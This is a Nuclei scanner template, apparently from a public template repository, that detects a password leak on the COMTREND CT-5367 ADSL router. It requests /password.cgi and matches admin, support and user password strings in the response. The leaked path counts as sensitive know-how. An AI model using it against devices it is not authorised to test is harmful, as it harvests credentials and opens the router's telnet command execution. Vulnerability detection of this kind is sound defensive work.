nuclei-templates/vulnerabilities/other/comtrend-password-exposure....

id: comtrend-passsword-exposure

info:
  name: COMTREND ADSL Router CT-5367 C01_R12 - Remote Code Execution
  author: geeknik
  severity: high
  description: A vulnerability in COMTREND ADSL Router allows remote authenticated users to execute arbitrary commands via the telnet interface, the password for this interface is leaked to unauthenticated users via the 'password.cgi' endpoint.
  reference: https://www.exploit-db.com/exploits/16275
  tags: router,exposure,iot

# This template only checks for the credential leak at /password.cgi;
# it does not touch the telnet interface named in the description.
requests:
  - method: GET
    path:
      - "{{BaseURL}}/password.cgi"

    # Both matchers must succeed for a finding.
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      # All three password variable assignments must appear in the response,
      # which keeps a page containing only one of the strings from matching.
      - type: word
        words:
          - "pwdAdmin ="
          - "pwdSupport ="
          - "pwdUser ="
        condition: and